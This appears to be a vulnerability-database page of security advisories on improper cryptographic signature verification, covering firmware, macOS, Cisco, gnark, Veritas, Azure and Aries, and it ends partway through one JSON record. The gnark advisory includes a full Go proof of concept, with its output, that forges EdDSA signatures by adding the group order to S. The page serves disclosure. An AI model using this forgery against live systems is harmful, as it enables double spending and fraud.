Common Weakness Enumeration

CWE-347

Allowed

Improper Verification of Cryptographic Signature

Abstraction: Base · Status: Draft

The product does not verify, or incorrectly verifies, the cryptographic signature for data.

1127 vulnerabilities reference this CWE, most recent first.

GHSA-9434-662F-57FM

Vulnerability from github – Published: 2025-10-01 18:30 – Updated: 2025-10-01 18:30
VLAI
Details

E3 Site Supervisor Control (firmware version < 2.31F01) firmware upgrade packages are unsigned. An attacker can forge malicious firmware upgrade packages. An attacker with admin access to the application services can install a malicious firmware upgrade.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-52550"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-02T12:15:37Z",
    "severity": "HIGH"
  },
  "details": "E3 Site Supervisor Control (firmware version \u003c 2.31F01) firmware upgrade packages are unsigned. An attacker can forge malicious firmware upgrade packages. An attacker with admin access to the application services can install a malicious firmware upgrade.",
  "id": "GHSA-9434-662f-57fm",
  "modified": "2025-10-01T18:30:38Z",
  "published": "2025-10-01T18:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52550"
    },
    {
      "type": "WEB",
      "url": "https://www.armis.com/research/frostbyte10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-943H-6FX4-C427

Vulnerability from github – Published: 2026-03-25 03:31 – Updated: 2026-03-25 18:31
VLAI
Details

A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. An app may be able to access user-sensitive data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-20699"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T01:17:06Z",
    "severity": "MODERATE"
  },
  "details": "A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. An app may be able to access user-sensitive data.",
  "id": "GHSA-943h-6fx4-c427",
  "modified": "2026-03-25T18:31:41Z",
  "published": "2026-03-25T03:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20699"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126348"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126794"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126795"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126796"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-94RV-67RM-Q3V8

Vulnerability from github – Published: 2022-03-05 00:00 – Updated: 2022-03-17 00:03
VLAI
Details

STMicroelectronics STSAFE-J 1.1.4, J-SAFE3 1.2.5, and J-SIGN sometimes allow attackers to abuse signature verification. This is associated with the ECDSA signature algorithm on the Java Card J-SAFE3 and STSAFE-J platforms exposing a 3.0.4 Java Card API. It is exploitable for STSAFE-J in closed configuration and J-SIGN (when signature verification is activated) but not for J-SAFE3 EPASS BAC and EAC products. It might also impact other products based on the J-SAFE-3 Java Card platform.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-43393"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-04T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "STMicroelectronics STSAFE-J 1.1.4, J-SAFE3 1.2.5, and J-SIGN sometimes allow attackers to abuse signature verification. This is associated with the ECDSA signature algorithm on the Java Card J-SAFE3 and STSAFE-J platforms exposing a 3.0.4 Java Card API. It is exploitable for STSAFE-J in closed configuration and J-SIGN (when signature verification is activated) but not for J-SAFE3 EPASS BAC and EAC products. It might also impact other products based on the J-SAFE-3 Java Card platform.",
  "id": "GHSA-94rv-67rm-q3v8",
  "modified": "2022-03-17T00:03:34Z",
  "published": "2022-03-05T00:00:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43393"
    },
    {
      "type": "WEB",
      "url": "https://community.st.com/s/toparticles"
    },
    {
      "type": "WEB",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2022-AVI-169"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95H6-VGWG-QCQC

Vulnerability from github – Published: 2025-05-07 18:30 – Updated: 2025-05-07 18:30
VLAI
Details

A vulnerability in Cisco IOS Software for Cisco Catalyst 2960X, 2960XR, 2960CX, and 3560CX Series Switches could allow an authenticated, local attacker with privilege level 15 or an unauthenticated attacker with physical access to the device to execute persistent code at boot time and break the chain of trust.

This vulnerability is due to missing signature verification for specific files that may be loaded during the device boot process. An attacker could exploit this vulnerability by placing a crafted file into a specific location on an affected device. A successful exploit could allow the attacker to execute arbitrary code at boot time.

Because this allows the attacker to bypass a major security feature of the device, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-20181"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-07T18:15:37Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in Cisco IOS Software for Cisco Catalyst 2960X, 2960XR, 2960CX, and 3560CX Series Switches could allow an authenticated, local attacker with privilege level 15 or an unauthenticated attacker with physical access to the device to execute persistent code at boot time and break the chain of trust.\n\n This vulnerability is due to missing signature verification for specific files that may be loaded during the device boot process. An attacker could exploit this vulnerability by placing a crafted file into a specific location on an affected device. A successful exploit could allow the attacker to execute arbitrary code at boot time.\n\n Because this allows the attacker to bypass a major security feature of the device, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.",
  "id": "GHSA-95h6-vgwg-qcqc",
  "modified": "2025-05-07T18:30:49Z",
  "published": "2025-05-07T18:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20181"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-c2960-3560-sboot-ZtqADrHq"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95V9-HV42-PWRJ

Vulnerability from github – Published: 2025-08-22 20:58 – Updated: 2026-01-22 16:04
VLAI
Summary
gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks
Details

In version before, sig.s used without asserting 0 ≤ S < order in Verify function in eddsa.go and ecdsa.go, which will lead to signature malleability vulnerability.

Impact

Since gnark’s native EdDSA and ECDSA circuits lack essential constraints, multiple distinct witnesses can satisfy the same public inputs. In protocols where nullifiers or anti-replay checks are derived from (R, S), this enables signature malleability and may lead to double spending.

Exploitation

package main

import (
    "crypto/rand"
    "fmt"
    "math/big"

    "github.com/consensys/gnark-crypto/ecc"
    mimcHash "github.com/consensys/gnark-crypto/ecc/bn254/fr/mimc"
    eddsaCrypto "github.com/consensys/gnark-crypto/ecc/bn254/twistededwards/eddsa"

    "github.com/consensys/gnark/backend/groth16"
    "github.com/consensys/gnark/frontend"
    "github.com/consensys/gnark/frontend/cs/r1cs"
    "github.com/consensys/gnark/std/algebra/native/twistededwards"
    stdMimc "github.com/consensys/gnark/std/hash/mimc"
    stdEddsa "github.com/consensys/gnark/std/signature/eddsa"

    te "github.com/consensys/gnark-crypto/ecc/twistededwards"
)

// Circuit
type eddsaCircuit struct {
    Msg frontend.Variable  `gnark:",public"`
    Pk  stdEddsa.PublicKey `gnark:",public"`
    Sig stdEddsa.Signature
}

func (c *eddsaCircuit) Define(api frontend.API) error {
    curve, _ := twistededwards.NewEdCurve(api, te.BN254)
    hasher, _ := stdMimc.NewMiMC(api)
    stdEddsa.Verify(curve, c.Sig, c.Msg, c.Pk, &hasher)
    return nil
}

func groupOrder() *big.Int {
    // BN254 scalar field order (r)
    const rStr = "21888242871839275222246405745257275088548364400416034343698204186575808495617"
    n, _ := new(big.Int).SetString(rStr, 10)
    return n
}

// Forge signature: S → S + order
func forge(sig eddsaCrypto.Signature) eddsaCrypto.Signature {
    order := groupOrder()

    var forged eddsaCrypto.Signature
    forged.R = sig.R

    s := new(big.Int).SetBytes(sig.S[:])
    s.Add(s, order)

    buf := make([]byte, 32)
    copy(buf[32-len(s.Bytes()):], s.Bytes())
    copy(forged.S[:], buf)
    return forged
}

func main() {
    // Generate key pair
    priv, _ := eddsaCrypto.GenerateKey(rand.Reader)
    pub := priv.PublicKey
    msg := []byte("multi-witness")

    // Create honest signature
    h := mimcHash.NewMiMC()
    h.Write(msg)
    rawSig, _ := priv.Sign(msg, h)

    var honest eddsaCrypto.Signature
    honest.SetBytes(rawSig)
    forged := forge(honest) // S + order

    // Setup: Compile circuit and do trusted setup
    circuit := &eddsaCircuit{}
    ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, circuit)
    if err != nil {
        fmt.Printf("Circuit compilation failed: %v\n", err)
        return
    }

    pk, vk, err := groth16.Setup(ccs)
    if err != nil {
        fmt.Printf("Trusted setup failed: %v\n", err)
        return
    }

    // Public inputs (same for both witnesses)
    var public eddsaCircuit
    public.Msg = new(big.Int).SetBytes(msg)
    public.Pk.Assign(te.BN254, pub.Bytes())

    // witness 1: honest signature
    w1 := public
    w1.Sig.Assign(te.BN254, honest.Bytes())

    witness1, err := frontend.NewWitness(&w1, ecc.BN254.ScalarField())
    if err != nil {
        fmt.Printf("Failed to create witness1: %v\n", err)
        return
    }

    proof1, err := groth16.Prove(ccs, pk, witness1)
    if err != nil {
        fmt.Println("Witness 1 (honest): Prover failed!")
    } else {
        publicWitness1, err := witness1.Public()
        if err != nil {
            fmt.Println("Witness 1 (honest): Prover failed!")
        } else {
            err = groth16.Verify(proof1, vk, publicWitness1)
            if err != nil {
                fmt.Println("Witness 1 (honest): Prover failed!")
            } else {
                fmt.Println("Witness 1 (honest): Prover succeeded!")
            }
        }
    }

    // witness 2: forged signature
    w2 := public
    w2.Sig.Assign(te.BN254, forged.Bytes())
    fmt.Println(honest.R.Equal(&forged.R))
    fmt.Println(honest.S != forged.S)

    witness2, err := frontend.NewWitness(&w2, ecc.BN254.ScalarField())
    if err != nil {
        fmt.Printf("Failed to create witness2: %v\n", err)
        return
    }

    proof2, err := groth16.Prove(ccs, pk, witness2)
    if err != nil {
        fmt.Println("Witness 2 (forged): Prover failed!")
    } else {
        publicWitness2, err := witness2.Public()
        if err != nil {
            fmt.Println("Witness 2 (forged): Prover failed!")
        } else {
            err = groth16.Verify(proof2, vk, publicWitness2)
            if err != nil {
                fmt.Println("Witness 2 (forged): Prover failed!")
            } else {
                fmt.Println("Witness 2 (forged): Prover succeeded!")
            }
        }
    }
}

Result

go run multiple_witnesses.go

13:47:33 INF compiling circuit
13:47:33 INF parsed circuit inputs nbPublic=3 nbSecret=3
13:47:33 INF building constraint builder nbConstraints=7003
13:47:33 DBG constraint system solver done nbConstraints=7003 took=2.696334
13:47:33 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=7003 took=44.164208
13:47:33 DBG verifier done backend=groth16 curve=bn254 took=0.983583
Witness 1 (honest): Prover succeeded!
true
true
13:47:33 DBG constraint system solver done nbConstraints=7003 took=2.59125
13:47:33 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=7003 took=47.168709
13:47:33 DBG verifier done backend=groth16 curve=bn254 took=0.995833
Witness 2 (forged): Prover succeeded!

Credits

XlabAI Team of Tencent Xuanwu Lab

Atuin Automated Vulnerability Discovery Engine

SJTU Group of Software Security In Progress

Prof. Yu Yu's Lab at SJTU

Additional mitigation

The initial patch added check for s <= curve order, omitting the case s == curve order. Even though the case is unlikely to be exploitable (requires finding a preimage for H(R || A || M)), then it is additionally fixed in https://github.com/Consensys/gnark/pull/1684 (commit https://github.com/Consensys/gnark/commit/69638c5f14b77ae0ebee23e1d8f64f3bb4e22fd5 on master). Thanks for additional reporting by https://github.com/kexinoh.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/consensys/gnark"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57801"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-22T20:58:21Z",
    "nvd_published_at": "2025-08-22T20:15:33Z",
    "severity": "HIGH"
  },
  "details": "In version before, `sig.s` used without asserting `0 \u2264 S \u003c order` in `Verify function` in [eddsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/eddsa/eddsa.go) and [ecdsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/ecdsa/ecdsa.go), which will lead to *signature malleability* vulnerability. \n\n\n\n### Impact\n\nSince gnark\u2019s native EdDSA and ECDSA circuits lack essential constraints, multiple distinct witnesses can satisfy the same public inputs. In protocols where nullifiers or anti-replay checks are derived from `(R, S)`, this enables signature malleability and may lead to double spending.\n\n\n\n### Exploitation\n\n```go\npackage main\n\nimport (\n\t\"crypto/rand\"\n\t\"fmt\"\n\t\"math/big\"\n\n\t\"github.com/consensys/gnark-crypto/ecc\"\n\tmimcHash \"github.com/consensys/gnark-crypto/ecc/bn254/fr/mimc\"\n\teddsaCrypto \"github.com/consensys/gnark-crypto/ecc/bn254/twistededwards/eddsa\"\n\n\t\"github.com/consensys/gnark/backend/groth16\"\n\t\"github.com/consensys/gnark/frontend\"\n\t\"github.com/consensys/gnark/frontend/cs/r1cs\"\n\t\"github.com/consensys/gnark/std/algebra/native/twistededwards\"\n\tstdMimc \"github.com/consensys/gnark/std/hash/mimc\"\n\tstdEddsa \"github.com/consensys/gnark/std/signature/eddsa\"\n\n\tte \"github.com/consensys/gnark-crypto/ecc/twistededwards\"\n)\n\n// Circuit\ntype eddsaCircuit struct {\n\tMsg frontend.Variable  `gnark:\",public\"`\n\tPk  stdEddsa.PublicKey `gnark:\",public\"`\n\tSig stdEddsa.Signature\n}\n\nfunc (c *eddsaCircuit) Define(api frontend.API) error {\n\tcurve, _ := twistededwards.NewEdCurve(api, te.BN254)\n\thasher, _ := stdMimc.NewMiMC(api)\n\tstdEddsa.Verify(curve, c.Sig, c.Msg, c.Pk, \u0026hasher)\n\treturn nil\n}\n\nfunc groupOrder() *big.Int {\n\t// BN254 scalar field order (r)\n\tconst rStr = \"21888242871839275222246405745257275088548364400416034343698204186575808495617\"\n\tn, _ := new(big.Int).SetString(rStr, 10)\n\treturn n\n}\n\n// Forge signature: S \u2192 S + order\nfunc forge(sig eddsaCrypto.Signature) eddsaCrypto.Signature {\n\torder := groupOrder()\n\n\tvar forged eddsaCrypto.Signature\n\tforged.R = sig.R\n\n\ts := new(big.Int).SetBytes(sig.S[:])\n\ts.Add(s, order)\n\n\tbuf := make([]byte, 32)\n\tcopy(buf[32-len(s.Bytes()):], s.Bytes())\n\tcopy(forged.S[:], buf)\n\treturn forged\n}\n\nfunc main() {\n\t// Generate key pair\n\tpriv, _ := eddsaCrypto.GenerateKey(rand.Reader)\n\tpub := priv.PublicKey\n\tmsg := []byte(\"multi-witness\")\n\n\t// Create honest signature\n\th := mimcHash.NewMiMC()\n\th.Write(msg)\n\trawSig, _ := priv.Sign(msg, h)\n\n\tvar honest eddsaCrypto.Signature\n\thonest.SetBytes(rawSig)\n\tforged := forge(honest) // S + order\n\n\t// Setup: Compile circuit and do trusted setup\n\tcircuit := \u0026eddsaCircuit{}\n\tccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, circuit)\n\tif err != nil {\n\t\tfmt.Printf(\"Circuit compilation failed: %v\\n\", err)\n\t\treturn\n\t}\n\n\tpk, vk, err := groth16.Setup(ccs)\n\tif err != nil {\n\t\tfmt.Printf(\"Trusted setup failed: %v\\n\", err)\n\t\treturn\n\t}\n\n\t// Public inputs (same for both witnesses)\n\tvar public eddsaCircuit\n\tpublic.Msg = new(big.Int).SetBytes(msg)\n\tpublic.Pk.Assign(te.BN254, pub.Bytes())\n\n\t// witness 1: honest signature\n\tw1 := public\n\tw1.Sig.Assign(te.BN254, honest.Bytes())\n\n\twitness1, err := frontend.NewWitness(\u0026w1, ecc.BN254.ScalarField())\n\tif err != nil {\n\t\tfmt.Printf(\"Failed to create witness1: %v\\n\", err)\n\t\treturn\n\t}\n\n\tproof1, err := groth16.Prove(ccs, pk, witness1)\n\tif err != nil {\n\t\tfmt.Println(\"Witness 1 (honest): Prover failed!\")\n\t} else {\n\t\tpublicWitness1, err := witness1.Public()\n\t\tif err != nil {\n\t\t\tfmt.Println(\"Witness 1 (honest): Prover failed!\")\n\t\t} else {\n\t\t\terr = groth16.Verify(proof1, vk, publicWitness1)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Witness 1 (honest): Prover failed!\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Witness 1 (honest): Prover succeeded!\")\n\t\t\t}\n\t\t}\n\t}\n\n\t// witness 2: forged signature\n\tw2 := public\n\tw2.Sig.Assign(te.BN254, forged.Bytes())\n\tfmt.Println(honest.R.Equal(\u0026forged.R))\n\tfmt.Println(honest.S != forged.S)\n\n\twitness2, err := frontend.NewWitness(\u0026w2, ecc.BN254.ScalarField())\n\tif err != nil {\n\t\tfmt.Printf(\"Failed to create witness2: %v\\n\", err)\n\t\treturn\n\t}\n\n\tproof2, err := groth16.Prove(ccs, pk, witness2)\n\tif err != nil {\n\t\tfmt.Println(\"Witness 2 (forged): Prover failed!\")\n\t} else {\n\t\tpublicWitness2, err := witness2.Public()\n\t\tif err != nil {\n\t\t\tfmt.Println(\"Witness 2 (forged): Prover failed!\")\n\t\t} else {\n\t\t\terr = groth16.Verify(proof2, vk, publicWitness2)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Witness 2 (forged): Prover failed!\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Witness 2 (forged): Prover succeeded!\")\n\t\t\t}\n\t\t}\n\t}\n}\n```\n\n### Result\n\n```bash\ngo run multiple_witnesses.go\n\n13:47:33 INF compiling circuit\n13:47:33 INF parsed circuit inputs nbPublic=3 nbSecret=3\n13:47:33 INF building constraint builder nbConstraints=7003\n13:47:33 DBG constraint system solver done nbConstraints=7003 took=2.696334\n13:47:33 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=7003 took=44.164208\n13:47:33 DBG verifier done backend=groth16 curve=bn254 took=0.983583\nWitness 1 (honest): Prover succeeded!\ntrue\ntrue\n13:47:33 DBG constraint system solver done nbConstraints=7003 took=2.59125\n13:47:33 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=7003 took=47.168709\n13:47:33 DBG verifier done backend=groth16 curve=bn254 took=0.995833\nWitness 2 (forged): Prover succeeded!\n```\n\n\n\n### Credits\n\nXlabAI Team of Tencent Xuanwu Lab\n\nAtuin Automated Vulnerability Discovery Engine \n\nSJTU Group of Software Security In Progress\n\nProf. Yu Yu\u0027s Lab at SJTU\n\n### Additional mitigation\n\nThe initial patch added check for `s \u003c= curve order`, omitting the case `s == curve order`. Even though the case is unlikely to be exploitable (requires finding a preimage for `H(R || A || M)`), then it is additionally fixed in https://github.com/Consensys/gnark/pull/1684 (commit https://github.com/Consensys/gnark/commit/69638c5f14b77ae0ebee23e1d8f64f3bb4e22fd5 on master). Thanks for additional reporting by https://github.com/kexinoh.",
  "id": "GHSA-95v9-hv42-pwrj",
  "modified": "2026-01-22T16:04:13Z",
  "published": "2025-08-22T20:58:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Consensys/gnark/security/advisories/GHSA-95v9-hv42-pwrj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57801"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Consensys/gnark/commit/0ba6730f05537a351517998add89a61a0d82716e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Consensys/gnark"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3912"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks"
}

GHSA-9749-2MFQ-HV49

Vulnerability from github – Published: 2023-03-24 06:30 – Updated: 2023-03-31 15:30
VLAI
Details

An issue was discovered in Veritas NetBackup IT Analytics 11 before 11.2.0. The application upgrade process included unsigned files that could be exploited and result in a customer installing unauthentic components. A malicious actor could install rogue Collector executable files (aptare.jar or upgrademanager.zip) on the Portal server, which might then be downloaded and installed on collectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28818"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347",
      "CWE-494"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-24T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Veritas NetBackup IT Analytics 11 before 11.2.0. The application upgrade process included unsigned files that could be exploited and result in a customer installing unauthentic components. A malicious actor could install rogue Collector executable files (aptare.jar or upgrademanager.zip) on the Portal server, which might then be downloaded and installed on collectors.",
  "id": "GHSA-9749-2mfq-hv49",
  "modified": "2023-03-31T15:30:19Z",
  "published": "2023-03-24T06:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28818"
    },
    {
      "type": "WEB",
      "url": "https://www.veritas.com/content/support/en_US/security/VTS23-002"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-97JF-46M3-8953

Vulnerability from github – Published: 2026-05-12 18:30 – Updated: 2026-06-02 22:18
VLAI
Summary
Security feature bypass vulnerability in Azure Key Vault Keys library for Java
Details

The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.azure:azure-security-keyvault-keys"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.10.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33117"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-02T22:18:30Z",
    "nvd_published_at": "2026-05-12T18:17:04Z",
    "severity": "CRITICAL"
  },
  "details": "The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.",
  "id": "GHSA-97jf-46m3-8953",
  "modified": "2026-06-02T22:18:30Z",
  "published": "2026-05-12T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33117"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Azure/azure-sdk-for-java/pull/48476"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Azure/azure-sdk-for-java/commit/1b5c5c79d85a5c9a9cfd07f6cdff6fd0f50eccf9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Azure/azure-sdk-for-java"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Security feature bypass vulnerability in Azure Key Vault Keys library for Java"
}

GHSA-97X9-59RV-Q5PM

Vulnerability from github – Published: 2024-01-09 20:31 – Updated: 2024-01-11 15:42
VLAI
Summary
Hyperledger Aries Cloud Agent Python result of presentation verification not checked for LDP-VC
Details

Impact

When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation document.proof was not factored into the final verified value (true/false) on the presentation record. Below is an example result from verifying a JSON-LD Presentation where there is an error noted in the processing (mismatched challenge), but the overall result is incorrectly "verified": true:

{
  "verified": true,
  "presentation_result": {
    "verified": false,
    "document": {
      "@context": [
        "https://www.w3.org/2018/credentials/v1"
      ],
      "type": [
        "VerifiablePresentation"
      ],
      "verifiableCredential": [
        {
          "@context": [
            "https://www.w3.org/2018/credentials/v1",
            "https://w3id.org/citizenship/v1"
          ],
          "type": [
            "VerifiableCredential",
            "PermanentResident"
          ],
          "issuer": "did:sov:EzcfrVw7Tveho5NjrmDWnd",
          "issuanceDate": "2023-11-18",
          "credentialSubject": {
            "type": [
              "PermanentResident"
            ],
            "id": "did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C",
            "givenName": "Bob",
            "familyName": "Builder",
            "gender": "Male",
            "birthCountry": "Bahamas",
            "birthDate": "1958-07-17"
          },
          "proof": {
            "type": "Ed25519Signature2018",
            "proofPurpose": "assertionMethod",
            "verificationMethod": "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1",
            "created": "2023-11-18T21:39:56.988853+00:00",
            "jws": "eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA"
          }
        }
      ],
      "proof": {
        "type": "Ed25519Signature2018",
        "proofPurpose": "authentication",
        "verificationMethod": "did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C",
        "created": "2023-11-18T21:39:59.188276+00:00",
        "challenge": "ce0956d4-206d-4b69-a087-52bbb9ddaf1d",
        "jws": "eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw"
      }
    },
    "results": [
      {
        "verified": false,
        "proof": {
          "@context": [
            "https://www.w3.org/2018/credentials/v1"
          ],
          "type": "Ed25519Signature2018",
          "proofPurpose": "authentication",
          "verificationMethod": "did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C",
          "created": "2023-11-18T21:39:59.188276+00:00",
          "challenge": "ce0956d4-206d-4b69-a087-52bbb9ddaf1d",
          "jws": "eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw"
        },
        "error": "The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969",
        "purpose_result": {
          "valid": false,
          "error": "The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969"
        }
      }
    ],
    "errors": [
